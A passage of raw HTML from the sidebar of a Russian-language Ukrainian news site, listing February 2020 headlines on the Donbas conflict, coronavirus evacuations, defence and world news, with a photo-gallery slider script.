href="https://enovosty.com/news_kiev/full/1902-stalo-izvestno-skolko-zhilyx-domov-v-kieve-podlezhat-snosu-iz-za-avarijnogo-sostoyaniya" title="Стало известно, сколько жилых домов в Киеве подлежат сносу из-за аварийного состояния" class="name">Стало известно, сколько жилых домов в Киеве подлежат сносу из-за аварийного состояния <span>(2168)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news-auto/full/1902-statistika-dtp-v-ukraine-za-yanvar-2020-goda-cifry-shokiruyut" title="Опубликована пугающая статистика ДТП в Украине за январь"><img width="210" height="156" alt="Опубликована пугающая статистика ДТП в Украине за январь" src="https://enovosty.com/wp-content/uploads/2020/02/ddddd-e1582108861373.jpg"></a><a href="https://enovosty.com/news-auto/full/1902-statistika-dtp-v-ukraine-za-yanvar-2020-goda-cifry-shokiruyut" title="Опубликована пугающая статистика ДТП в Украине за январь" class="name">Опубликована пугающая статистика ДТП в Украине за январь <span>(1260)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news_economy/full/1902-v-minoborony-poyasnili-situaciyu-s-finansirovaniem-neptuna-i-vilxi" title="В Минобороны пояснили ситуацию с финансированием Нептуна и Вильхи"><img width="210" height="156" alt="В Минобороны пояснили ситуацию с финансированием Нептуна и Вильхи" src="https://enovosty.com/wp-content/uploads/2020/02/3635055_900.jpg"></a><a href="https://enovosty.com/news_economy/full/1902-v-minoborony-poyasnili-situaciyu-s-finansirovaniem-neptuna-i-vilxi" title="В Минобороны пояснили ситуацию с финансированием Нептуна и Вильхи" class="name">В Минобороны пояснили ситуацию с финансированием "Нептуна" и "Вильхи" <span>(5308)</span></a></li></ul></li><li><ul class="tact"><li id="li9" style="width:210px;"><a href="https://enovosty.com/news_politics/full/1902-v-obse-rasskazali-chto-videli-vo-vremya-vcherashnego-tyazhelogo-boya-na-donbasse" title="В ОБСЕ рассказали, что видели во время вчерашнего тяжелого боя на Донбассе"><img width="210" height="156" alt="В ОБСЕ рассказали, что видели во время вчерашнего тяжелого боя на Донбассе" src="https://enovosty.com/wp-content/uploads/2020/02/obse2.jpg"></a><a href="https://enovosty.com/news_politics/full/1902-v-obse-rasskazali-chto-videli-vo-vremya-vcherashnego-tyazhelogo-boya-na-donbasse" title="В ОБСЕ рассказали, что видели во время вчерашнего тяжелого боя на Донбассе" class="name">В ОБСЕ рассказали, что видели во время вчерашнего тяжелого боя на Донбассе <span>(2700)</span></a></li></ul></li><li><ul class="tact"><li id="li10" style="width:210px;"><a href="https://enovosty.com/news_politics/full/1902-u-mira-est-tolko-odin-variant-volker-poyasnil-chego-rossiya-xochet-okkupirovav-territorii-ukrainy" title="У мира есть только один вариант: Волкер пояснил, чего Россия хочет, оккупировав территории Украины"><img width="210" height="156" alt="У мира есть только один вариант: Волкер пояснил, чего Россия хочет, оккупировав территории Украины" src="https://enovosty.com/wp-content/uploads/2020/02/volker.jpg"></a><a href="https://enovosty.com/news_politics/full/1902-u-mira-est-tolko-odin-variant-volker-poyasnil-chego-rossiya-xochet-okkupirovav-territorii-ukrainy" title="У мира есть только один вариант: Волкер пояснил, чего Россия хочет, оккупировав территории Украины" class="name">У мира есть только один вариант: Волкер пояснил, чего Россия хочет, оккупировав территории Украины <span>(2112)</span></a></li></ul></li><li><ul class="tact"><li id="li11" style="width:210px;"><a href="https://enovosty.com/news_politics/full/1902-obvinili-rossiyu-i-grozyat-sankciyami-strany-es-i-ssha-stali-na-storonu-ukrainy-v-oon" title="Обвинили Россию: Страны ЕС и США стали на сторону Украины в ООН"><img width="210" height="156" alt="Обвинили Россию: Страны ЕС и США стали на сторону Украины в ООН" src="https://enovosty.com/wp-content/uploads/2020/02/ba8ae970ef6640bf4ff5813a59d5105f570e0c16-e1582095165698.jpg"></a><a href="https://enovosty.com/news_politics/full/1902-obvinili-rossiyu-i-grozyat-sankciyami-strany-es-i-ssha-stali-na-storonu-ukrainy-v-oon" title="Обвинили Россию: Страны ЕС и США стали на сторону Украины в ООН" class="name">Обвинили Россию: Страны ЕС и США стали на сторону Украины в ООН <span>(982)</span></a></li></ul></li><li><ul class="tact"><li id="li12" style="width:210px;"><a href="https://enovosty.com/news_abroad/full/1802-mirovye-ceny-na-neft-nachali-padat-na-fone-opasenij-sokrashheniya-sprosa-reuters" title="Мировые цены на нефть начали падать на фоне опасений сокращения спроса, - Reuters"><img width="210" height="156" alt="Мировые цены на нефть начали падать на фоне опасений сокращения спроса, - Reuters" src="https://enovosty.com/wp-content/uploads/2020/02/19_main-2.jpg"></a><a href="https://enovosty.com/news_abroad/full/1802-mirovye-ceny-na-neft-nachali-padat-na-fone-opasenij-sokrashheniya-sprosa-reuters" title="Мировые цены на нефть начали падать на фоне опасений сокращения спроса, - Reuters" class="name">Мировые цены на нефть начали падать на фоне опасений сокращения спроса, - Reuters <span>(1776)</span></a></li></ul></li><li><ul class="tact"><li id="li13" style="width:210px;"><a href="https://enovosty.com/news_society/full/1802-ukraina-znachitelno-uvelichila-rasxody-na-oboronu" title="Украина значительно увеличила расходы на оборону"><img width="210" height="156" alt="Украина значительно увеличила расходы на оборону" src="https://enovosty.com/wp-content/uploads/2020/02/1277473.png"></a><a href="https://enovosty.com/news_society/full/1802-ukraina-znachitelno-uvelichila-rasxody-na-oboronu" title="Украина значительно увеличила расходы на оборону" class="name">Украина значительно увеличила расходы на оборону <span>(1696)</span></a></li></ul></li><li><ul class="tact"><li id="li14" style="width:210px;"><a href="https://enovosty.com/news-finance/full/1802-snizhenie-uchetnoj-stavki-pozvolilo-snizit-kredity-dlya-biznesa-do-157" title="Снижение учетной ставки позволило снизить стоимость кредитов для бизнеса до 15,7%"><img width="210" height="156" alt="Снижение учетной ставки позволило снизить стоимость кредитов для бизнеса до 15,7%" src="https://enovosty.com/wp-content/uploads/2020/02/national_bank_of_ukraine_new-2.jpg"></a><a href="https://enovosty.com/news-finance/full/1802-snizhenie-uchetnoj-stavki-pozvolilo-snizit-kredity-dlya-biznesa-do-157" title="Снижение учетной ставки позволило снизить стоимость кредитов для бизнеса до 15,7%" class="name">Снижение учетной ставки позволило снизить стоимость кредитов для бизнеса до 15,7% <span>(816)</span></a></li></ul></li></ul></div><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="topnews_single slide gallery2" style="width: 168px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery2"><li><ul class="tact"><li id="li0" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=549&pid=11992" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/goldshteyn/thumbs/thumbs_afrikanskie-zakaty-3.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Потрясающие африканские закаты от фотографа дикой природы"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=549&pid=11992" title="Потрясающие африканские закаты от фотографа дикой природы" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Потрясающие африканские закаты от фотографа дикой природы</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=548&pid=11976" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/yapon_ulitsa/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="День и ночь на японских улицах"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=548&pid=11976" title="День и ночь на японских улицах" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">День и ночь на японских улицах</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=547&pid=11961" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/pekin_do/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Китай без людей: до и после коронавируса"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=547&pid=11961" title="Китай без людей: до и после коронавируса" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Китай без людей: до и после коронавируса</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=546&pid=11952" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/fin_zvezdy/thumbs/thumbs_07.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Финн под звездами делает завораживающие кадры"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=546&pid=11952" title="Финн под звездами делает завораживающие кадры" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Финн под звездами делает завораживающие кадры</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><script>jQuery(document).ready(function($){$('#slider_gallery2').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery2 div.anythingSlider-minimalist-round span.arrow{height:160px}</style><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости технологий</p></div><div class='cls'></div><span class='news_date'>20.02.2020 г.</span><br /><div class="post_news"><span id="post-4795251"><span class="postDate">14:00</span><a class="postTitle" href="https://enovosty.com/news_technology/full/2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii">Пакистан успешно испытал ядерную ракету-носитель Ra’ad-II</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4795314"><span class="postDate">13:20</span><a class="postTitle" href="https://enovosty.com/news_technology/full/2002-amerikanskij-flot-mozhet-poluchit-eshhe-odin-krejser">Американский флот может получить еще один крейсер</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>19.02.2020 г.</span><br /><div class="post_news"><span id="post-4795095"><span class="postDate">15:20</span><a class="postTitle" href="https://enovosty.com/news_technology/full/1902-britanskaya-armiya-sobiraetsya-stroit-elektricheskie-boevye-mashiny">Британская армия собирается строить электрические боевые машины</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4795154"><span class="postDate">15:18</span><a class="postTitle" href="https://enovosty.com/news_technology/full/1902-rossijskij-ledokol-arktika-vyshel-iz-stroya-sgorevshij-dvigatel-ne-podlezhit-vosstanovleniyu">Не судьба: "Росатом" не успеет сдать в срок атомный ледокол "Арктика" - двигатель сгорел</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4795081"><span class="postDate">08:19</span><a class="postTitle" href="https://enovosty.com/news_technology/full/1902-spacex-zajmetsya-kosmicheskim-turizmom-pervyj-polet-zaplanirovan-na-2021-god">SpaceX займется космическим туризмом: первый полет запланирован на 2021 год</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4795029"><span class="postDate">07:50</span><a class="postTitle" href="https://enovosty.com/news_technology/full/1902-kitajskie-uchenye-sozdali-robota-kotoryj-pomozhet-raspoznat-koronavirus">Китайские ученые создали робота, который поможет распознать коронавирус</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4795031"><span class="postDate">07:00</span><a class="postTitle" href="https://enovosty.com/news_technology/full/1902-ssha-otkazalis-ot-ocherednoj-voennoj-programmy-prekrashhena-razrabotka-perspektivnoj-rakety-mirm">США отказались от очередной военной программы: прекращена разработка перспективной ракеты MIRM</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news_technology">Все новости технологий</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">19.02.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/1902-itogi-dnya-podderzhka-mira-tri-scenariya-dlya-ukrainy-i-kurortnyj-bezviz">Итоги дня: Поддержка мира, три сценария для Украины и курортный безвиз</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/1902-itogi-dnya-podderzhka-mira-tri-scenariya-dlya-ukrainy-i-kurortnyj-bezviz"><img width="230" alt="Итоги дня: Поддержка мира, три сценария для Украины и курортный безвиз" src="/wp-content/uploads/2020/02/308-e1582128675532.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/1902-itogi-dnya-podderzhka-mira-tri-scenariya-dlya-ukrainy-i-kurortnyj-bezviz">Пять стран ЕС в Совбезе ООН выступили с важным заявлением в поддержку Украины, Кабмин дал денег фермерам, учителям и ветеранам, а Украина вводит безвиз ...</a></span></div><div class="block"><div class="info"><span class="postDate">19.02.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/1902-novoe-obostrenie-na-donbasse-stavit-davno-nazrevshie-voprosy">Новое обострение на Донбассе ставит давно назревшие вопросы</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/1902-novoe-obostrenie-na-donbasse-stavit-davno-nazrevshie-voprosy"><img width="230" alt="Новое обострение на Донбассе ставит давно назревшие вопросы" src="/wp-content/uploads/2020/02/cover_voyna.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/1902-novoe-obostrenie-na-donbasse-stavit-davno-nazrevshie-voprosy">Прежде всего это вопрос о том, окончится ли когда-нибудь война на Донбассе, вернется ли Донбасс когда-либо в Украину и нужно ли вообще, чтобы он в Украину ...</a></span></div><div class="block"><div class="info"><span class="postDate">18.02.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/1802-itogi-dnya-tyazhelye-boi-na-donbasse-krovavye-godovshhiny-i">Итоги дня: Тяжелые бои на Донбассе, кровавые годовщины и предупреждение для РФ</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/1802-itogi-dnya-tyazhelye-boi-na-donbasse-krovavye-godovshhiny-i"><img width="230" alt="Итоги дня: Тяжелые бои на Донбассе, кровавые годовщины и предупреждение для РФ" src="/wp-content/uploads/2020/02/boj-e1582046976657.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/1802-itogi-dnya-tyazhelye-boi-na-donbasse-krovavye-godovshhiny-i">Украина отмечает победное завершение Революции Достоинства и чтит память героев Небесной Сотни, на Донбассе развязались самые горячие за последние годы ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>20.02.2020 г.</span><br /><div class="post_news"> <span id="post-4795329"> <span class="postDate">14:31</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2002-politicheskij-i-deshyovyj-piar-raduckij-o-bunte-v-novyx-sanzharax-iz-za-evakuirovannyx-iz-kitaya-lyudej-video">«Политический и дешёвый пиар»: Радуцкий о бунте в Новых Санжарах из-за эвакуированных из Китая людей (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795318"> <span class="postDate">14:20</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2002-nazvana-data-kogda-megan-markl-i-princ-garri-okonchatelno-slozhat-svoi-korolevskie-polnomochiya">Названа дата, когда Меган Маркл и принц Гарри окончательно сложат свои королевские полномочия</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795251"> <span class="postDate">14:00</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2002-pakistan-uspeshno-ispytal-yadernuyu-raketu-nositel-raad-ii">Пакистан успешно испытал ядерную ракету-носитель Ra’ad-II</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795316"> <span class="postDate">13:40</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2002-kitajcy-sozdali-kopiyu-toyota-land-cruiser-200-kak-ona-vyglyadit-foto">Китайцы создали копию Toyota Land Cruiser 200: как она выглядит (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795320"> <span class="postDate">13:30</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/2002-zvezda-vlastelina-kolec-vpervye-stal-otcom">Звезда "Властелина колец" впервые стал отцом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795314"> <span class="postDate">13:20</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2002-amerikanskij-flot-mozhet-poluchit-eshhe-odin-krejser">Американский флот может получить еще один крейсер</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795321"> <span class="postDate">13:11</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2002-evakuaciyu-ukraincev-iz-uxanya-prevratili-v-kakuyu-to-uxnyu-aleksej-gonchareno-video">Эвакуацию украинцев из Уханя превратили в какую-то ухню, - Алексей Гончарено (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795244"> <span class="postDate">13:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2002-ssha-i-greciya-proveli-voennye-ucheniya-s-boevoj-strelboj-u-podnozhiya-gory-olimp-foto">США и Греция провели военные учения с боевой стрельбой у подножия горы Олимп (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795309"> <span class="postDate">12:44</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2002-ministr-oborony-zayavil-ob-ostavlennom-opornom-punkte-vsu">Министр обороны заявил об оставленном опорном пункте ВСУ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795312"> <span class="postDate">12:31</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/2002-zhiteli-kieva-prosyat-oborudovat-eshhe-odnu-stanciyu-gorodskoj-elektrichki">Жители Киева просят оборудовать еще одну станцию городской электрички</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795304"> <span class="postDate">12:16</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2002-ukraincy-ne-chuvstvuyut-sebya-v-bezopasnosti-yurchishin-o-reakcii-obshhestva-na-evakuaciyu-iz-kitaya-video">«Украинцы не чувствуют себя в безопасности»: Юрчишин о реакции общества на эвакуацию из Китая (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795308"> <span class="postDate">12:13</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2002-ukraina-znaet-vse-v-minoborony-podschitali-putinskix-naemnikov-na-donbasse">"Украина знает все": В Минобороны подсчитали путинских наемников на Донбассе</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795306"> <span class="postDate">12:11</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2002-glava-mid-rasskazal-kak-izmenil-otnosheniya-ssha-i-ukrainy-impichment-trampa">Глава МИД рассказал, как изменил отношения США и Украины импичмент Трампа</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795303"> <span class="postDate">12:10</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2002-nazvana-trojka-luchshix-gubernatorov-skalskij-shmygal-prokopenko">Названа тройка лучших губернаторов: Скальский, Шмыгаль, Прокопенко</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795298"> <span class="postDate">11:53</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2002-india-neozhidanno-reshila-stat-liderom-v-oblasti-zelenoj-energetiki">Индия неожиданно решила стать лидером в области "зеленой" энергетики</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795300"> <span class="postDate">11:52</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2002-ukrainskim-selyanam-poobeshhali-bogatuyu-zhizn">Украинским селянам пообещали богатую жизнь</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795299"> <span class="postDate">11:48</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2002-ukraincy-uzhe-zadeklarirovali-pochti-4-mlrd-griven-doxodov">Украинцы уже задекларировали почти 4 млрд гривен доходов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795295"> <span class="postDate">11:33</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2002-prezident-obratilsya-k-ukraincam-iz-za-evakuacii-grazhdan-iz-kitaya">Президент обратился к украинцам из-за эвакуации граждан из Китая</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795294"> <span class="postDate">11:12</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2002-evakuirovannyx-iz-kitaya-ukraincev-otvezut-na-karantin-v-poltavskuyu-oblast-aleksandr-kachura-video">Эвакуированных из Китая украинцев отвезут на карантин в Полтавскую область, - Александр Качура (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795284"> <span class="postDate">09:04</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2002-situaciya-na-donbasse-snajpery-rf-atakovali-vsu">Ситуация на Донбассе: Снайперы РФ атаковали ВСУ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795282"> <span class="postDate">09:03</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2002-kto-to-iz-nix-yavno-nepravilnyj-putin-na-foto-putina-zametili-strannuyu-detal">"Кто-то из них явно неправильный Путин": На фото Путина заметили странную деталь</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795278"> <span class="postDate">08:47</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/2002-v-seti-pokazali-posledstviya-ataki-rf-na-vsu-video">Земля пылала. В Сети показали последствия атаки РФ на ВСУ (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795281"> <span class="postDate">08:45</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2002-tv-dlya-okkupirovannyx-territorij-budut-konsultirovat-vedushhie-112-kanala">ТВ для оккупированных территорий будут консультировать ведущие 112 канала</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795280"> <span class="postDate">08:39</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2002-v-britanii-ne-budut-lechit-gomofobov-rasistov-seksistov">В Британии не будут лечить гомофобов, расистов, сексистов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795279"> <span class="postDate">08:36</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2002-amerikanskij-i-rossijskij-broneavtomobili-vstupili-v-konflikt-v-sirii-video">Американский и российский бронеавтомобили вступили в конфликт в Сирии (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795275"> <span class="postDate">08:11</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2002-ukraincev-zabrali-iz-uxanya-samolet-zastryal-nad-xarkovom-smi">Украинцев забрали из Уханя: самолет "застрял" над Харьковом, - СМИ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795232"> <span class="postDate">07:40</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2002-obnadezhivayushhie-novosti-uchenye-zayavili-chto-epidemiya-koronavirusa-poshla-na-spad">Обнадеживающие новости: ученые заявили, что эпидемия коронавируса пошла на спад</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795267"> <span class="postDate">07:17</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2002-erdogan-gotov-nachat-operaciyu-v-idlibe-v-lyuboj-moment">Эрдоган готов начать операцию в Идлибе «в любой момент»</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795228"> <span class="postDate">07:15</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/2002-qr-bilet-v-stolichnom-transporte-dlya-chego-on-nuzhen-i-kak-im-polzovatsya">QR-билет в столичном транспорте: для чего он нужен и как им пользоваться</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795234"> <span class="postDate">06:50</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1902-luchee-foto-novorozhdennymi-shhenkami-pokorilo-set-foto">Собачье семейство с новорожденными щенками покорило сеть (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795273"> <span class="postDate">06:33</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2002-vozmozhna-eskalaciya-rossiya-v-oon-progolosovala-protiv-prekrashheniya-ognya-v-sirii">Возможна эскалация: Россия в ООН проголосовала против прекращения огня в Сирии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795271"> <span class="postDate">00:01</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2002-tramp-predlagal-pomilovat-dzhuliana-assanzha-esli-on-zayavit-o-neprichastnosti-rossii-k-vzlomu-serverov-demokraticheskoj-partii">Трамп предлагал помиловать Джулиана Ассанжа, если он заявит о непричастности России к взлому серверов Демократической партии</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>19.02.2020 г.</span><br /><div class="post_news"> <span id="post-4795265"> <span class="postDate">23:23</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-sueta-v-kremle-putin-ponyal-chto-proigral-piontkovskiy">"Суета в Кремле": Путин понял, что проиграл - Пионтковский</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795237"> <span class="postDate">22:55</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-zvezda-walmart-rabotnica-amerikanskogo-supermarketa-yarko-poziruet-dlya-reklamy-foto">Звезда Walmart: работница американского супермаркета ярко позирует для рекламы (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795262"> <span class="postDate">22:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1902-kontrrazvedchiki-sbu-zaderzhali-agenta-luganskix-terroristov">Контрразведчики СБУ задержали агента луганских террористов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795259"> <span class="postDate">22:32</span> <a class="postTitle" href="https://enovosty.com/news_incidents/full/1902-vsem-bojcam-ozvuchili-plan-nastupleniya-na-ukropov-boevik-vozmutilsya-lozhyu-o-nastuplenii">"Всем бойцам озвучили план наступления на укропов" - боевик возмутился ложью о наступлении</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795260"> <span class="postDate">22:20</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-vozle-rosnefti-i-gazproma-nachali-rvatsya-snaryady-anti-colorados">Возле "Роснефти" и "Газпрома" начали "рваться снаряды", - Anti-colorados</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795250"> <span class="postDate">21:53</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/1902-nash-giperlup-vpered-letit-k-konechnoj-ostanovke-kompan-rasskazal-o-perspektivax-ovgz">"Наш гиперлуп вперед летит, к конечной остановке": Компан рассказал о перспективах ОВГЗ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795242"> <span class="postDate">21:28</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-f-35-niveliruet-su-57-ne-tolko-po-vsem-frontam-no-i-v-zachatke-zloj-odessit">F-35 нивелирует СУ-57 не только по всем фронтам, но и в зачатке, - Злой Одессит</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795236"> <span class="postDate">20:42</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1902-ssha-v-lyuboe-vremya-gotovy-k-peregovoram-s-iranom-pompeo">США «в любое время» готовы к переговорам с Ираном, - Помпео</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795227"> <span class="postDate">20:16</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1902-v-ukraine-sushhestvennogo-sokratili-razmer-materialnoj-pomoshhi-voennosluzhashhim">В Украине существенного сократили размер материальной помощи военнослужащим</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4795218"> <span class="postDate">19:58</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1902-v-dnepre-specnazovcy-kord-osvobodili-poxishhennuyu-zhenshhinu-video">В Днепре спецназовцы КОРД освободили похищенную женщину (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span 